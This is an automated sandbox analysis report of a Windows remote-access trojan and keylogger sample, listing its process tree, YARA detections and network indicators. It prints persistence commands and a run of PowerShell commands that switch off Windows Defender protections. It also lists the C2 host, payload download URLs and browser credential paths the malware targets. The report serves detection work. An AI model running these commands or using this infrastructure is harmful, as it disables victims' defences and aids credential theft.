Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
JeCXrQSehB.exe

Overview

General Information

Sample Name:JeCXrQSehB.exe
Analysis ID:723742
MD5:17e6bffaff1ea223913deb1bc78e74ae
SHA1:67daf17f3c8f6d2169b24f9a3698921991bbba2f
SHA256:af1d446bb3abc47b5eacb7a00ebb1992be1c464cac5b0e4283b12f0500c3ad4e
Tags:exeQuasarRATRAT
Infos:

Detection

Vermin Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Vermin Keylogger
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Disables Windows Defender (via service or powershell)
Protects its processes via BreakOnTermination flag
.NET source code references suspicious native API functions
Contains functionality to hide user accounts
Machine Learning detection for sample
May check the online IP address of the machine
Yara detected Generic Downloader
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • JeCXrQSehB.exe (PID: 3480 cmdline: C:\Users\user\Desktop\JeCXrQSehB.exe MD5: 17E6BFFAFF1EA223913DEB1BC78E74AE)
    • schtasks.exe (PID: 2296 cmdline: "schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Users\user\Desktop\JeCXrQSehB.exe" /rl HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Client.exe (PID: 4204 cmdline: C:\Users\user\AppData\Roaming\UPX\Client.exe MD5: 17E6BFFAFF1EA223913DEB1BC78E74AE)
      • schtasks.exe (PID: 2308 cmdline: "schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\UPX\Client.exe" /rl HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 4884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5264 cmdline: "powershell" Get-MpPreference -verbose MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5272 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5728 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2896 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5428 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5452 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5612 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2912 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1120 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1048 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6024 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4928 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • JeCXrQSehB.exe (PID: 5240 cmdline: C:\Users\user\Desktop\JeCXrQSehB.exe MD5: 17E6BFFAFF1EA223913DEB1BC78E74AE)
  • cleanup
{"Version": "2.1.0.0", "Host:Port": "checkme12.freeddns.org:1604;", "InstallName": "Client.exe", "MutexName": "VNM_MUTEX_yidaALoSEROfTPWHwX", "StartupKey": "Venom Client Startup", "Tag": "asdf", "LogDirectoryName": "Logs"}
SourceRuleDescriptionAuthorStrings
JeCXrQSehB.exeVermin_Keylogger_Jan18_1Detects Vermin KeyloggerFlorian Roth
  • 0x5374e:$x3: GetKeyloggerLogsResponse
  • 0x52705:$x4: GetKeyloggerLogs
  • 0x529dd:$s1: <RunHidden>k__BackingField
  • 0x5389a:$s2: set_SystemInfos
  • 0x52a06:$s3: set_RunHidden
  • 0x52536:$s4: set_RemotePath
  • 0x4b94e:$s7: xClient.Core.ReverseProxy.Packets
JeCXrQSehB.exeMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
  • 0x7e8ef:$a1: \Opera Software\Opera Stable\Login Data
  • 0x7eba1:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x7eab3:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x7eb55:$a4: \Orbitum\User Data\Default\Login Data
  • 0x7eb0b:$a5: \Kometa\User Data\Default\Login Data
JeCXrQSehB.exeCertutil_Decode_OR_DownloadCertutil DecodeFlorian Roth
  • 0x7c096:$a1: certutil -decode
JeCXrQSehB.exexRAT_1Detects Patchwork malwareFlorian Roth
  • 0x47527:$x4: xClient.Properties.Resources.resources
  • 0x52a06:$s7: set_RunHidden
JeCXrQSehB.exeQuasar_RAT_1Detects Quasar RATFlorian Roth
  • 0x529ca:$s1: DoUploadAndExecute
  • 0x52c09:$s2: DoDownloadAndExecute
  • 0x5278f:$s3: DoShellExecute
  • 0x52bce:$s4: set_Processname
  • 0x20c48:$op1: 04 1E FE 02 04 16 FE 01 60
Click to see the 9 entries
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\UPX\Client.exeVermin_Keylogger_Jan18_1Detects Vermin KeyloggerFlorian Roth
  • 0x5374e:$x3: GetKeyloggerLogsResponse
  • 0x52705:$x4: GetKeyloggerLogs
  • 0x529dd:$s1: <RunHidden>k__BackingField
  • 0x5389a:$s2: set_SystemInfos
  • 0x52a06:$s3: set_RunHidden
  • 0x52536:$s4: set_RemotePath
  • 0x4b94e:$s7: xClient.Core.ReverseProxy.Packets
C:\Users\user\AppData\Roaming\UPX\Client.exeMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
  • 0x7e8ef:$a1: \Opera Software\Opera Stable\Login Data
  • 0x7eba1:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x7eab3:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x7eb55:$a4: \Orbitum\User Data\Default\Login Data
  • 0x7eb0b:$a5: \Kometa\User Data\Default\Login Data
C:\Users\user\AppData\Roaming\UPX\Client.exeCertutil_Decode_OR_DownloadCertutil DecodeFlorian Roth
  • 0x7c096:$a1: certutil -decode
C:\Users\user\AppData\Roaming\UPX\Client.exexRAT_1Detects Patchwork malwareFlorian Roth
  • 0x47527:$x4: xClient.Properties.Resources.resources
  • 0x52a06:$s7: set_RunHidden
C:\Users\user\AppData\Roaming\UPX\Client.exeQuasar_RAT_1Detects Quasar RATFlorian Roth
  • 0x529ca:$s1: DoUploadAndExecute
  • 0x52c09:$s2: DoDownloadAndExecute
  • 0x5278f:$s3: DoShellExecute
  • 0x52bce:$s4: set_Processname
  • 0x20c48:$op1: 04 1E FE 02 04 16 FE 01 60
Click to see the 9 entries
SourceRuleDescriptionAuthorStrings
00000000.00000003.254146038.0000000004BC1000.00000004.00000800.00020000.00000000.sdmpCertutil_Decode_OR_DownloadCertutil DecodeFlorian Roth
  • 0x3c056:$a1: certutil -decode
00000000.00000003.254146038.0000000004BC1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000003.254146038.0000000004BC1000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Quasarrat_e52df647unknownunknown
    • 0x1370e:$a1: GetKeyloggerLogsResponse
    • 0x12bc9:$a2: DoDownloadAndExecute
    • 0x3d848:$a3: http://api.ipify.org/
    • 0x394ab:$a5: " /sc ONLOGON /tr "
    00000000.00000000.243030061.0000000000042000.00000002.00000001.01000000.00000003.sdmpCertutil_Decode_OR_DownloadCertutil DecodeFlorian Roth
    • 0x7be96:$a1: certutil -decode
    00000000.00000000.243030061.0000000000042000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Click to see the 4 entries
      SourceRuleDescriptionAuthorStrings
      0.0.JeCXrQSehB.exe.6809a.2.raw.unpackVermin_Keylogger_Jan18_1Detects Vermin KeyloggerFlorian Roth
      • 0x2d4b4:$x3: GetKeyloggerLogsResponse
      • 0x2c46b:$x4: GetKeyloggerLogs
      • 0x2c743:$s1: <RunHidden>k__BackingField
      • 0x2d600:$s2: set_SystemInfos
      • 0x2c76c:$s3: set_RunHidden
      • 0x2c29c:$s4: set_RemotePath
      • 0x256b4:$s7: xClient.Core.ReverseProxy.Packets
      0.0.JeCXrQSehB.exe.6809a.2.raw.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
      • 0x58655:$a1: \Opera Software\Opera Stable\Login Data
      • 0x58907:$a2: \Comodo\Dragon\User Data\Default\Login Data
      • 0x58819:$a3: \Google\Chrome\User Data\Default\Login Data
      • 0x588bb:$a4: \Orbitum\User Data\Default\Login Data
      • 0x58871:$a5: \Kometa\User Data\Default\Login Data
      0.0.JeCXrQSehB.exe.6809a.2.raw.unpackCertutil_Decode_OR_DownloadCertutil DecodeFlorian Roth
      • 0x55dfc:$a1: certutil -decode
      0.0.JeCXrQSehB.exe.6809a.2.raw.unpackxRAT_1Detects Patchwork malwareFlorian Roth
      • 0x2128d:$x4: xClient.Properties.Resources.resources
      • 0x2c76c:$s7: set_RunHidden
      0.0.JeCXrQSehB.exe.6809a.2.raw.unpackQuasar_RAT_1Detects Quasar RATFlorian Roth
      • 0x2c730:$s1: DoUploadAndExecute
      • 0x2c96f:$s2: DoDownloadAndExecute
      • 0x2c4f5:$s3: DoShellExecute
      • 0x2c934:$s4: set_Processname
      Click to see the 37 entries
      No Sigma rule has matched
      Timestamp:192.168.2.7208.95.112.149700802036383 10/15/22-08:26:57.685861
      SID:2036383
      Source Port:49700
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.7208.95.112.149697802036383 10/15/22-08:26:51.006464
      SID:2036383
      Source Port:49697
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: JeCXrQSehB.exeReversingLabs: Detection: 96%
      Source: JeCXrQSehB.exeVirustotal: Detection: 69%Perma Link
      Source: JeCXrQSehB.exeAvira: detected
      Source: Yara matchFile source: JeCXrQSehB.exe, type: SAMPLE
      Source: Yara matchFile source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000000.00000000.243030061.0000000000042000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPED
      Source: http://91.134.207.16/autoupdate1.exeAvira URL Cloud: Label: malware
      Source: http://91.134.207.16/Install.exeAvira URL Cloud: Label: malware
      Source: http://91.134.207.16/getrdp.exeAvira URL Cloud: Label: malware
      Source: http://91.134.207.16/rdpinstall.exeAvira URL Cloud: Label: malware
      Source: http://91.134.207.16/update.exeAvira URL Cloud: Label: malware
      Source: http://91.134.207.16/autoupdate2.exeAvira URL Cloud: Label: malware
      Source: http://91.134.207.16/svchost.exeAvira URL Cloud: Label: malware
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeReversingLabs: Detection: 96%
      Source: JeCXrQSehB.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeJoe Sandbox ML: detected
      Source: 0.0.JeCXrQSehB.exe.40000.0.unpackAvira: Label: TR/ATRAPS.Gen
      Source: JeCXrQSehB.exeMalware Configuration Extractor: Vermin Keylogger {"Version": "2.1.0.0", "Host:Port": "checkme12.freeddns.org:1604;", "InstallName": "Client.exe", "MutexName": "VNM_MUTEX_yidaALoSEROfTPWHwX", "StartupKey": "Venom Client Startup", "Tag": "asdf", "LogDirectoryName": "Logs"}
      Source: JeCXrQSehB.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: JeCXrQSehB.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: F:\coding\r77-rootkit-master\Install\obj\Debug\Install.pdbT0n0 `0_CorExeMainmscoree.dll source: JeCXrQSehB.exe, Client.exe.0.dr
      Source: Binary string: D:\CopyMySelf\obj\Release\Chrome.pdbMCgC YC_CorExeMainmscoree.dll source: JeCXrQSehB.exe, Client.exe.0.dr
      Source: Binary string: F:\coding\r77-rootkit-master\Install\obj\Debug\Install.pdb source: JeCXrQSehB.exe, Client.exe.0.dr
      Source: Binary string: D:\CopyMySelf\obj\Release\Chrome.pdb source: JeCXrQSehB.exe, Client.exe.0.dr

      Networking

      barindex
      Source: TrafficSnort IDS: 2036383 ET TROJAN Common RAT Connectivity Check Observed 192.168.2.7:49697 -> 208.95.112.1:80
      Source: TrafficSnort IDS: 2036383 ET TROJAN Common RAT Connectivity Check Observed 192.168.2.7:49700 -> 208.95.112.1:80
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeDNS query: name: ip-api.com
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeDNS query: name: ip-api.com
      Source: Yara matchFile source: JeCXrQSehB.exe, type: SAMPLE
      Source: Yara matchFile source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPED
      Source: Malware configuration extractorURLs: checkme12.freeddns.org
      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
      Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
      Source: global trafficTCP traffic: 192.168.2.7:49701 -> 37.0.14.217:1604
      Source: JeCXrQSehB.exe, Client.exe.0.drString found in binary or memory: http://127.0.0.1:4040/api/tunnels
      Source: JeCXrQSehB.exe, 00000000.00000002.575514159.0000000002540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.207.16
      Source: JeCXrQSehB.exe, Client.exe.0.drString found in binary or memory: http://91.134.207.16/Install.exe
      Source: JeCXrQSehB.exe, Client.exe.0.drString found in binary or memory: http://91.134.207.16/WinSCP.com
      Source: JeCXrQSehB.exe, Client.exe.0.drString found in binary or memory: http://91.134.207.16/WinSCP.exe
      Source: JeCXrQSehB.exe, Client.exe.0.drString found in binary or memory: http://91.134.207.16/autoupdate1.exe
      Source: JeCXrQSehB.exe, Client.exe.0.drString found in binary or memory: http://91.134.207.16/autoupdate2.exe
      Source: JeCXrQSehB.exe, Client.exe.0.drString found in binary or memory: http://91.134.207.16/getrdp.exe
      Source: Client.exe.0.drString found in binary or memory: http://91.134.207.16/ngrok.exe
      Source: JeCXrQSehB.exe, Client.exe.0.drString found in binary or memory: http://91.134.207.16/ngrok.exe=set
      Source: JeCXrQSehB.exe, Client.exe.0.drString found in binary or memory: http://91.134.207.16/rdpinstall.exe
      Source: JeCXrQSehB.exe, Client.exe.0.drString found in binary or memory: http://91.134.207.16/svchost.exe
      Source: JeCXrQSehB.exe, Client.exe.0.drString found in binary or memory: http://91.134.207.16/update.exe
      Source: JeCXrQSehB.exe, 00000000.00000002.575514159.0000000002540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.207.164yk
      Source: JeCXrQSehB.exe, Client.exe.0.drString found in binary or memory: http://api.ipify.org/
      Source: powershell.exe, 00000004.00000002.546296289.0000000003226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: JeCXrQSehB.exe, Client.exe.0.drString found in binary or memory: http://freegeoip.net/xml/
      Source: JeCXrQSehB.exe, 00000000.00000002.572828770.00000000024BF000.00000004.00000800.00020000.00000000.sdmp, JeCXrQSehB.exe, 00000000.00000002.574146381.0000000002503000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000003.00000002.573292447.000000000293C000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000003.00000002.573722720.0000000002953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
      Source: JeCXrQSehB.exe, Client.exe.0.drString found in binary or memory: http://ip-api.com/json/
      Source: JeCXrQSehB.exe, 00000000.00000002.572828770.00000000024BF000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000003.00000002.573292447.000000000293C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com4yk
      Source: JeCXrQSehB.exe, 00000000.00000002.575415268.000000000253C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://payloads-poison.000webhostapp.com
      Source: powershell.exe, 00000004.00000002.557667901.0000000004DBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: JeCXrQSehB.exe, 00000000.00000002.574146381.0000000002503000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000003.00000002.573722720.0000000002953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
      Source: JeCXrQSehB.exe, 00000000.00000002.572828770.00000000024BF000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000003.00000002.573292447.000000000293C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.555756345.0000000004C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: JeCXrQSehB.exe, 00000000.00000002.575415268.000000000253C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us-east-1.route-1.000webhost.awex.io
      Source: powershell.exe, 00000004.00000002.557667901.0000000004DBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000004.00000002.557667901.0000000004DBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000004.00000003.388509003.00000000057A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: JeCXrQSehB.exe, 00000000.00000002.574146381.0000000002503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://payloads-poison.000webhostapp.com
      Source: JeCXrQSehB.exe, 00000000.00000002.574146381.0000000002503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://payloads-poison.000webhostapp.com/r77-x64.dll
      Source: JeCXrQSehB.exe, Client.exe.0.drString found in binary or memory: https://payloads-poison.000webhostapp.com/r77-x64.dllkhttps://payloads-poison.000webhostapp.com/r77-
      Source: JeCXrQSehB.exe, 00000000.00000002.574146381.0000000002503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://payloads-poison.000webhostapp.com/r77-x86.dll
      Source: JeCXrQSehB.exe, 00000000.00000002.574146381.0000000002503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://payloads-poison.000webhostapp.com4yk
      Source: unknownDNS traffic detected: queries for: ip-api.com
      Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\UPX\Client.exeJump to behavior

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: JeCXrQSehB.exe, type: SAMPLE
      Source: Yara matchFile source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000000.00000000.243030061.0000000000042000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPED

      Operating System Destruction

      barindex
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: 01 00 00 00 Jump to behavior

      System Summary

      barindex
      Source: JeCXrQSehB.exe, type: SAMPLEMatched rule: Detects Vermin Keylogger Author: Florian Roth
      Source: JeCXrQSehB.exe, type: SAMPLEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
      Source: JeCXrQSehB.exe, type: SAMPLEMatched rule: Detects Patchwork malware Author: Florian Roth
      Source: JeCXrQSehB.exe, type: SAMPLEMatched rule: Detects Quasar RAT Author: Florian Roth
      Source: JeCXrQSehB.exe, type: SAMPLEMatched rule: Detects Quasar RAT Author: Florian Roth
      Source: JeCXrQSehB.exe, type: SAMPLEMatched rule: Detects QuasarRAT malware Author: Florian Roth
      Source: JeCXrQSehB.exe, type: SAMPLEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
      Source: JeCXrQSehB.exe, type: SAMPLEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
      Source: JeCXrQSehB.exe, type: SAMPLEMatched rule: QuasarRAT payload Author: ditekSHen
      Source: JeCXrQSehB.exe, type: SAMPLEMatched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
      Source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Vermin Keylogger Author: Florian Roth
      Source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
      Source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Patchwork malware Author: Florian Roth
      Source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
      Source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
      Source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
      Source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
      Source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
      Source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPEMatched rule: QuasarRAT payload Author: ditekSHen
      Source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
      Source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Vermin Keylogger Author: Florian Roth
      Source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
      Source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Patchwork malware Author: Florian Roth
      Source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
      Source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
      Source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
      Source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
